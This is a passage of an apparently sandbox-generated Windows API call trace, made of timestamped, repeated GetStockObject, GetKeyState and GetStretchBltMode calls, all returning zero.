(i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetKeyState (nVirtKey=1) returned 0 [0057.860] GetStretchBltMode (hdc=0x1) returned 0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetKeyState (nVirtKey=1) returned 0 [0057.860] GetStretchBltMode (hdc=0x1) returned 0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetKeyState (nVirtKey=1) returned 0 [0057.860] GetStretchBltMode (hdc=0x1) returned 0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.860] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetKeyState (nVirtKey=1) returned 0 [0057.861] GetStretchBltMode (hdc=0x1) returned 0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetKeyState (nVirtKey=1) returned 0 [0057.861] GetStretchBltMode (hdc=0x1) returned 0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.861] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetKeyState (nVirtKey=1) returned 0 [0057.862] GetStretchBltMode (hdc=0x1) returned 0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetKeyState (nVirtKey=1) returned 0 [0057.862] GetStretchBltMode (hdc=0x1) returned 0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetStockObject (i=789644) returned 0x0 [0057.862] GetKeyState (nVirtKey=1) returned 0 [0057.862] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.863] GetKeyState (nVirtKey=1) returned 0 [0057.863] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.864] GetKeyState (nVirtKey=1) returned 0 [0057.864] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.865] GetStretchBltMode (hdc=0x1) returned 0 [0057.865] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.866] GetKeyState (nVirtKey=1) returned 0 [0057.866] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.867] GetKeyState (nVirtKey=1) returned 0 [0057.867] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.868] GetStretchBltMode (hdc=0x1) returned 0 [0057.868] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.869] GetStretchBltMode (hdc=0x1) returned 0 [0057.869] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.870] GetKeyState (nVirtKey=1) returned 0 [0057.870] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.871] GetStretchBltMode (hdc=0x1) returned 0 [0057.871] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.872] GetKeyState (nVirtKey=1) returned 0 [0057.872] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.873] GetKeyState (nVirtKey=1) returned 0 [0057.873] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.874] GetStretchBltMode (hdc=0x1) returned 0 [0057.874] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.875] GetStretchBltMode (hdc=0x1) returned 0 [0057.875] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode 